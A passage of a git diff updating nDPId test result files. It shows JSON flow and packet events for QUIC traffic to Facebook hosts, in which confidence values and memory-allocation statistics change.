bytes +~~ total memory freed........: 6023394 bytes +~~ total allocations/frees...: 121248/121248 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 486 chars ~~ json string max len.......: 2110 chars 
diff --git a/test/results/quic-mvfst-27.pcapng.out b/test/results/quic-mvfst-27.pcapng.out
index 755230e7c..9dd7a7308 100644
--- a/test/results/quic-mvfst-27.pcapng.out
+++ b/test/results/quic-mvfst-27.pcapng.out
@@ -1,10 +1,10 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02172{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":41432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1326,"pkt_l4_len":1240,"thread_ts_msec":41432,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEAR6jcKAAIPRav6D4x1AbsE2OWQzPrOsAIIrbuyBEpv1K8AAES+140kYx8r1I1jytRmSbOd1I6+euAu\/WCog0hZ7CK2vbiQaDsUNhduZ4TaOU+YwMwzr4tFRPY4WVcwFZYxf3JpeyRLGb56IxYnrJ+wVEN3bI7bVdKHF8LObpsuaNgGvwptfsH+rDACd3BONx\/QShlSNEGgtojOTAb3IBxaMPoBBrqk2vcqdCneK9x+zToW6kQDTdEd1IieGWgR+hdSwpMJLkz6epIDIJvr2+7hnKY8vsay1GJiKAlvxUurjQpspuMDfgvdh0iM6M1FrTv7rKzGyRXK46jvoMQof1iOAPHATgwqM4ZuYMuNvt\/y0p1tz148IXIa\/fLbIf\/jtx8RB3egC2zhGA2mbRbaurTTw48eZ\/8+UmFX\/pGgD39VTuQ0iy3fwQ4KqkHSAZwYDfMrqtGQuy3zdVoOJcB1EfGcQ\/j15ErCmDlRT7vkVVWnNzp5ac2qQ30IkEy79yMP2uQl+qcNCK7LBv3ES0ZAYMoMzeMHxcHojmxmY7m9pU8\/6TN1mmhBOL55YskIGgF5b9dubHYOHRFbIoVzLmlUMAC3n\/J8icXYhMzF+2LMmkFk5V6Ftpg6RFwazyDsV1VvAG0px\/ZReUsDZc2BpKOvPXUMcmmbi7J+4xk79GjDWU7qn9No\/9OgaUBSqlTMXjLKVw1AQS9DQbbP6Ljm2tjkBmxsNgiaX3ZHZdlEZ39g+pfa+C3d0\/Me91SnnyzofgyFHFf\/FZrz8kZlG+cPy3y6jToJU9oYVkDn4scTl9+EJRhVW2fiSh2BpNrkr1jxBS6nl0AbZVVuTjZo1emeItVe2pTwk9uLFdXZ\/CsWVBwjAwBQ8vxgzBGFWe9Cz3WpWkEzkAzQeOKzfLIFJb1PdMquNCwMajA4Jx\/Cl8vTf2306+VAoELddtYLnop0Ayp+TxS0Rn4I5pIhgtvtCnBaEOMmPLVrk2Tj6N4i6o4MT6NN2UsGMhl2jrLGVEchP8VeBBOrUPQTIvY+Xm1UQd6ud\/GSXz1lmW9JWN\/jvl2VrC\/dEdNNNDsuFT5DVQqiDS81yxHlMqpnUJtGOqdXBxl\/ipvbbIFVJMAxqaqhOIq9lLXVi0WRSrle2jY8C6byBzVmaXR9ob+Wj5JgOJ4dl6+zmTJfROyutrX06SLZW3iXBCGlGsJZa3VoAGsKr8R2PPaQW1IM5QBB1\/g3l2+\/8cMTpVbSj+AToLePRXNLpaht6\/i0lf5tmm5WeIZEw\/kp8XgE1IVG1OwCHdXi3LW8Ju6ZT6+NSDZYRl5iCIMOLeH+Uqa7zxr6BPSdijI5fZHwJ7CyzIIsLtNldUOOeWaUdszlpTm5UglrnEBk\/8+KIWEVomulKHSD78LbyMa2ZwRhHyUIoQUx3u628eG5WvmgiPmoWBpQq0SAcNJkibSZlfyukZBXk6ytoD7RL+6u7B+gDbgoIKW3EI2Vygx0786PDvzKNz\/jICcqh071958oOMWvZwK4wNNnPl+hmatacx8NLqlbU4\/qy23i+aLaPb\/wBxpmPXyakND4mOvFt3dmh
\/yOVbINbAdZZ958R4K\/VXTGhgBSkxwXbKGKq+I\/xQwGAiri3PaDQBO6NYoKc0jqzc3rTGw44eUPJeiqQ8qEhbvrsfPi3A+VS5FRGlwZaAkkAdoB2gRkAwEAAAAAAAAAAAAAABYAAQACACEB2gAAAAAAAAAAAAAAAAAAAAANY6kd"} -00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00826{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":41432,"flow_last_seen":41432,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":41432,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 
02198{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":41464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"thread_ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHoAAEARKapFq\/oPCgACDwG7jHUE7DGTx\/rOsAIACGUZSqSBwJ2mAETSQ4uzcebnNMDWiCLwgEqse1zwFbQeUwCYbirASYBY9Wqb\/AVucNo+1QzVbJaW9TpMoqvmNgwqhyeKJHn4nzURskXOXtyoQu1UCn4VWBURvJjr0Pri5khEPw4xAwDV7X2Rmmpwaw6btUsOaonrqKF\/SrLeyArFzwB+JFVws5mjdog13nZj3AyrnfXROIcoKcafi5iIMUPL8fCRhq9X7vo879HkMFFe\/UL0Z6KfMxRHk\/gm5EOke7DkOtpvDqjM8A17vn\/YA\/LmKAMC318G22YHyWoexSGb3BcRVBGh\/JnZslVfKZDHgCPKBJ6TZoECS2S1Lkq5nHD0FrjB28JkpPGddocsvTJ4gXR11CtFRogKRhcL6ToomCWSsXQm4N4h+xa8EUgP+Qp0EvdNEgFlkK7QzIbTOeUkbO0qojWV6pfET3Iov+\/apIMX2oqertd1yP5huAQbmPBJDrUV5aSXJ2n4942yy8nej3YOzA3244Ppj3KJ1FI9fYQWy94tzkcAq0MyyNAtAzVQrMQHV9+ftrN2eaUEuTAr5G712uv1AnCx12zkzS\/bPkH5HakesCqHiBdPHaH4mxGfceFuvWrXvk9k8noKiLgriTnvQwp\/saWNDkm8kvfm9PpqQm+XgxMCJ0tq2pG80BHbTgRQV8MdZ11XnvblfPEVlDFLqayo6KQYDuE9pUfQ+9AqEaxGVZRMSVRaIpJDPVqd0UHWM8ATc92GN71YPW\/frstXWA7sGYASVobLo1b3c8kYQSBM7dcU\/iqAkl+FksHEaC1aLZjGfaRKtnrpTDuyyUXcztv9cqa5wo9RQzervEK0UxM3gVjtBBX1mCaBfaZIZdXvbDZThkMu9RGphMLYrx9SqWAcKRkM9YhQ4qnUOJEDTD2qoX8miGa+JoKbQ6qKnL2RRJM\/0dLcmr8S6LVgNf3TuED+N3hbsZ9OBQ7xHjHnYpm\/+OxE3iCQ7O\/MjCEYbY876HUh2UXvGhRXGh19ilKbwQQLH+dz5uix38Q4qECRqV09vmTz3Swbe+BtJ26CqtxI2DYiDUkT56hG4GnrWss\/5mqds3b7uwxVTv8iRTcgWALX6YR8I8LcEwnW6P35r6yzQ8NmLvjaaqZkC\/6YKBBhBFJ4gpdUENYZBLszMz\/0jCicUWKWyfwMDGVvAlcFM7uVWLy8jO0qLX37EScSwg3DeIeQr72\/VcJHLle0Tm+dHFDyuGwxcML\/AaZe6mgicoiyETeB09Smyq9Y78I5wTornR4T1K0JN64JfYcnJe1\/YmYcW1VlHkcIRW6sSa0q5r9kPM+iCHOL7wY9T6OnVogbkFJzee5fZ+Oq9S8PvlK+4jsPkUzDv6d3+PRuP5JWYWDpXd8Qhym58OswJSKelR1rmXKN2C\/uxVLv3kgZxbiHXFdSArCkFj5BWP4WtRYPeuQ5VALz9l8XUPpyq\/09yKtHs\/TW2KvPCNoNxInVtL\/9V7UyFB2cFMukn2UUKBEJJUOWG0p+3sALv+tMcZpDx9cDnCtfccjlF6qNg6
Io5OabNDbmM3UDOyuHva8jvqAsKtELxYaeOp5rbZaQ+wK7lDWDooe0BUvE8YL9NWtHK\/I2zrwe4HzXFx1p5ULH4KoSajttOnTnVRnoaPTH5vR+8nV092hE6ZD\/6m9zExloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAACg8yWg="} 02198{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":41464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1346,"pkt_l4_len":1260,"thread_ts_msec":41464,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAHsAAEARKalFq\/oPCgACDwG7jHUE7Icwx\/rOsAIACGUZSqSBwJ2mAETStSk6pRwdyId1aH4WX4pVsk+hVtbLW4hKoqKIUKSo9tdUjjTVL5Yto7M3DICwaAoLYXCD+5dqw0TmZSrfqNiW2qJkNrsg0k\/kAdqV7j6+J9emg0iopVNY8z94Dkdknf05ci\/NoDXo7jX0aTp1J6GxxB8erH\/0SWZ+DyrbIMZ0xZ5SuS1DqMnN61NBKxN4\/jPv9ciPfLFFXyU0okn\/oJgJdQ4WrwMnOPK0yukS3dDQKMu5v+5h3OqBwQW1oLHmZA6rMWwlnpuiFU739YXcxuHETmzC2NOSBa0FZ1xSGByNv0mIS\/veQS6ztyCKi6cmIt52Goz5V26xn8ITbWRMKyzCQ9ygzGjFLSLB+V+ogEf08ganfO6W0dHJdPTEHqx274QToI6nzYBz8eQeCAoVd4nrh3slWslWTkHeQVW8sENY6mHlCHceqCHC8YwsKeoSN\/4JG6l1w4zyPArMZGkKB7jSxPuUQCGzOht7pw5Gk5Gp83Di44gZYUIyNVymDB16sT39aoraDeo5r5qBdNZ91SsMzaUcukPc+uOFPSAz0EuZbTe9n8OtdEkkzeGl9cG18rBcD7tfjxG18gi\/aTc\/Qsb2KdP82bZ\/OipJydJdUpM++DNflKBUq6VmZNq\/mEwBZaf36uML1LJOAoceV1rx2cgE7b5Wa2y583PSIvc0y8yCVCHd7UpFmIJOJrYMAiOgNdkL9i8G7a60vJ0BffKaiILbh52Cd\/gZSExquDEnfPS9pscJ3chfy\/\/FZGZ2CQbE65G5r2LgRj1a0KrZ\/O4ML+0k9MQaf9He5c\/jILvUKyvJwLUWG3lSoXOphrxABdatvx5PAii2lwtYhrYvxbQdkmGsIRtsvgWyth\/48R3yefn+bIHFq+Ln\/mQ4+8W6h+y9VYGjLy+j1gNFUujglm08r+aneixuCDo8NVE+WAW9F9bx6GkTQPaTP2\/obE0Ej5h95N8FRRXbNl8Q32+hc1BcPW7PYZhe4s7f99gVOs1PvusSkQjfl9x1h6vbtCoGsaxvv+KkMXJr040is81X8KUUNFqu8hZlZbEQdDUlK04iWVHyjfijDT4J15Tv7e9ZlWiE8P4TthJEkS\/V\/B6UFWx7NxNha5AI5q7ShAs7c3HMWi7ShahE0cUHWo1N0zwF8\/WnAGHEQUC8y4BhBQ7EaKwJ5nulzruzqp+D0MI00rZhOKTfBp6FWu0gmkwjBtMV14lN3KiO+Fugvl0PPD7usXWaKzR2dw4JslfP5IRxZB5PlrUhggAF+4XvJxhjRYhltzgO0VmcidYbokhyBxc5p8EN7Brdd5jbC5KWU5ziyf1Xh7
5DhXXM9GVyTUDxQyOG\/19oznEsnm6HNfViWsEBqqhaXc1PD0G1Ath517JUA\/pAp9aK6ha0kEfZOISLrdAh\/wfyRh1qF0vTiaYWT3z2kewwb2CKR6DkEQkLWuW6ksgBnomifnuXO\/A4qhCgYZUw8feNCqTOFonKJtx2NUnViJDtqHr07cnNA2vZFiN+8SsLW130LG60Uj0wsHpIPMQDNy88BvEV2fH8Yk1GkJTndWveloeKe4e8X8FUWonC0LnETHyEJoR6mY698HICIqyNVbCWwwIZl3RhkLsYcNRGWOHE1xH8nz2KWwIwVPQWegjsOIMvejTuWRloCSQB2gHaBGQDAQAAAAAAAAAAAAAAFgABAAIAIQHaAAAAAAAAAAAAAAAAAAAAAB\/S7Lg="} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":41432,"flow_last_seen":50392,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":9519,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":50392,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.171.250.15","src_port":35957,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-mvfst-27.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":9519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":50392} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880134 bytes -~~ total memory freed........: 5880134 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6013768 bytes +~~ total memory freed........: 6013768 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 2203 chars diff --git a/test/results/quic-mvfst-exp.pcap.out b/test/results/quic-mvfst-exp.pcap.out index 9848c0cac..93113ec09 100644 --- a/test/results/quic-mvfst-exp.pcap.out +++ b/test/results/quic-mvfst-exp.pcap.out 
@@ -2,10 +2,10 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1600365863681} 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1600365863681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863681,"pkt":"AAAAAAAAAAsAUu6Rht1gBpyIBNgRPyqszffVBngHkJIHX6lj9Ks\/Zezp\/nFuKvrOsAwAADWO4PMBuwTY\/EXK+s6wDgg1+NsuZhAnFwAARL4kVSVotvSiGmEI+vf+6CaV5hF7i\/CNKP0SXP7gxh\/sxeTenPB321XyE03WMCMX5b0eBa3DvRz2ddP3nWt6RdJ6WlZ9RTUGfAgTt+boE098trxFEsZIDO4\/DGShxxtoHXyvbFJFZJY0NVf+5UIwrXhHYlSki1K9uuFNSNm\/ALl0YIaUgr\/hopr4M+GsiGyiXAxXGDCmRgFFJroypQa7DZkA\/BSQvOBo1rqXUCQO+Y2WWIxccuRC5scGp+LAauwOKvDUuqswyG3OiHxvk+4qy\/tgRCHGZHD5raZzP7vxY5Zs6GXSOIKOFNW9+pK0jmGVAbreKgkrE9sNhCR5J7EDI\/UBo5nIVV7hZ+6dUskPxqT226TZBRzj0d\/LhQMJiWr\/Qtbyf20wKLkGnJvpCUZRODDUv\/HGzAiYKec9iLyl0xI4dsRlBPj3\/qk96+vHWCFBI5LJgkJSDIg2Oo0As+19Rmue72aosPjR8lHRyP7b2qSVRFvzkCL3hktDhhGNO2\/8vk6Dat1dxesYiMWkhhopkoH3vOXEevmQ1BrZpcIa7nhP0ob5JIk\/hYvfODfiXG2nnd65+lyb3xKLOkY1QOG2eHx4XtxJxV95ybltVj+AOro0Qb33f0uOBVhhxvPUxRnp1BveoGGqIq\/gfX6EzojL9Sr70hu0h97z51g5q\/G2yqDMTtMccVw+1tkM704jcVZPtS1KIRHzNry1Wih4L55uLybOgft8GHReUqVXO1rtmuTmjHvXxkkq+hW3ZO6Zpt9Zifkk1BLxuaoYoAdg22ALnpTN7VcYCixWlGY122eH2AkgeHYXtrQFh65CCR9dukVHEdRzSFLcF70tHYbZmR+Hm+VVpk48niHEmJvv4wz9TBdQco4TCXjTYLJ6WcVyXCnuHUIWmzQviL8DqcqYSvAxXtEwy\/ABThsNXM6AftQYLRXbcYkYcHWoidGESnafRJGVZwQz25kCkv7ZqgFWYx1xBNnbz9WMnFbBke3DlYRgpZd0ntBDhPehb1WGgxtlkSGO7bjYqCQFYUxhzr1MjEh8JkUM3KCwxgTJlwEoiFSZNBGWOnQnoaXqibsTGdkQ5xDUg\/xJIomN6D9X+YN7QfJRKDelG4gB\/R7MztnSA22E0XjX\/\/YRNN+qvPmrVWdwLFx5rwOTZ2Bwq1XJX0Y4X9FYc8xlkhOJreo9JcUXHssUuTUo6BWARFU9bhlwavKy3u7J0kMozdjG\/WbocG2iKuKdvYnwlwF4XA49pUvEDnV0LhAGSigDeY9WEVq5NPU8kaL0aKpcV9sZJjCTDkCQvVnASsCd3+zuMIFTH\/wm3IfeUdpSYh69FBYn0JPZJnE\/f2WC+G83QQZNTxoXLd9yFjxvmJQ7W1L4zZf2d490E4pdqLfAEFuTNKFuLGgQ+LZN4YH\/5qowNrJyvVezIyiysoAoiKoYlx0R5mslIlSfPbwSJbTB1uxs3rqeOf8ivbtSiOzeCzsWN
JXJslzqZupoGqw7\/SmaFxzLXGXzdi02UgxbJUV3MNetwoWntiOQ\/Z\/49uutTCmO52WyUtp6uT2QPgpYOad0YVkiJmMQURNTDa6EXQiGewAMntXsHYGBjMrsKmJQ9FFiiK9Zn62NIBtpITbvAg=="} -00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1600365863681,"flow_last_seen":1600365863681,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1600365863681,"l3_proto":"ip6","src_ip":"2aac:cdf7:d506:7807:9092:75f:a963:f4ab","dst_ip":"3f65:ece9:fe71:6e2a:face:b00c::358e","src_port":57587,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"video.fmct2-3.fna.fbcdn.net","version":"TLSv1.3","alpn":"h3-fb-05","ja3":"61d8a93ff379660087082a82411f19a2","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 
02137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1600365863701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYmwjO+s6wDgAIQAXJhFchLk8ARL4QIqQn9j8g7J8Bh4qCkeFtB5\/0FGTn+dKSN5WCFIbqlv7bVzxI20ou9DR4wZtJJ1tiJ+xKr0U8bw68OiZZpHUxdfAbQt5z9nLh6LwQjhupiCyRyGRG4tZtrrKw42zS4Ryis2IGVu85jtVJ5nO+V0iHkiCiLoE8hCZ0cGFWISDSv1dY3S14L6Uo3v29iGRvafufSczvMFlG6pV1Odn60vjKDyGOsjNfQ9JF1v3zXLwm1apIxIVcfBTY7dYxW+7A\/6rJf9YKYeoWeijbkQb34JP1dRaHcbT0etmi0uxefz\/YpbkDoFCI2oRZYlTE23H22X2\/8qTclFOyvh9\/vrwFZRygQGeuEH0eSUfPKF67ybi2A9VLUgtZeELBeNOyIaY60evevqb5J2vN5l8HhG0zOtje8P2BEWzkJo0Csm59hN04WUIa5ATdibyB79oIitMR\/RT8b5BC7j9v8ipjp7vZOZEdpCwIDJgn2+33CJSdL94AfQkLgk+uiUPVfgG6UfHrZnytLApyrmygXaAukdakyxq8klTjQRRDyfNa3VwsyyGBmq5gY8nskXcJNY50BpTnu2okLH4hDlVPoMhoCfYEzT7EHkcCPMiRCP1enF\/yeF8dCloVpkR+7DVld9MS6A1Lm8Vh1cgyHuQtCdgJL16zetK\/eyN+QHBXERWmIl3nQXc4BBMK5ejTHXiedJd7krVe8qEtgPgfs9wmex+wAK7s5a4apAlIsdt8wz8irGiTLVD13enE0LCSiK+iT4XC+unYkKdA\/Y+wC15ozprq5ssSs4BUO4\/LwAxujOwLjXa68Kc\/HILSJzhfUsfYNAz8ZOR1P4+bGu9drz2VDwRHLiESKyby173GizQy9QPlUMhgv8zZQ9s8\/V4XeqMJ2FBmnAhANLW8ozDP3m1tk1Eysb4\/m\/zhRgvMN6Md\/gGHDzGnf86ee9efaPJdzEGlKuMWsJB9rG8dFeoooOlhDVE0RcRoPulOkfUBVPkd5y1hJVChJAS8upfL7rieCvjioLCngyXZRWw5EtbWEua8f58+BR4BcVUt44qeVBM19jSN8fMZZCruGfLvFJ8LXrWCMFf8QO9ppSf6AUMeDx2xJm\/vFPFkKj8USDUUV3A4BGBehJmSMJTIQdNx+L65jyOdOELItpQ53YcWuejF0bJ6ksEA2i+ns6L\/A4TyViXUhBAVmjDLSCellA9lXrJ4FKFi2ddTtc7XO4WCnc0rXB48fPr0idZPP5kV7JjzsYEnZ8xNPrb2\/crCya5nVZMRH13HQUZZTbK+kcSm91aipEqc2RxTK15a3fE2lVuvJTMS7pY+WzcwkPFNhssmcyRE4TsroEk6noloCsxsQjvyZSEcSwSKx4KJegr4NeCh6RxPXe153PB1fX43\/bpL23QEtBIoibzoy6LAuxzsnv2SoFcWb+0UW2hrfng6tjiLOL78QaL2I0pt8Q8p5cHXe8AZixhNLMuBlkVaMkSQfTYE7a0q8
9JM+YV0fG49Y5VAbDOBtfzmYnlO9p9ri9AifV7FZEwCvdDlnQ+KvbXRJdIOtcMSTz6mCvUiZ2cGGkiUCLImG1NMuhrftxnzx3oMcBYdm8CBM4CS3ZhaADSEfSg2j+9P8DImBKXKQw=="} 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-exp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1600365863701,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1600365863701,"pkt":"AAAAAAAAAAoAaIxPht1gAAAABNgROz9l7On+cW4q+s6wDAAANY4qrM331QZ4B5CSB1+pY\/SrAbvg8wTYHDzk+s6wDgAIQAXJhFchLk9Ev6msTcUGYFaKjK1nnOGqPfgGmbd2yH7YezNJksz4ObKOyK4ooRfPYXnIwINVzU9kFmpDrySNcGo7oy085NMAXtrRBQxP\/BNGfiNh2k7HVEmtnbBrN9B4q0PdqBJlnR3nfvlqn4KMbB+v3pyflyp0t2eXjVN9BCvAEWt1323hMhRhYp7IjuM\/7LS+4JZqwAit2H9\/as8+O1Z3qJKcua5iRqQUGQX4hx+lXxOP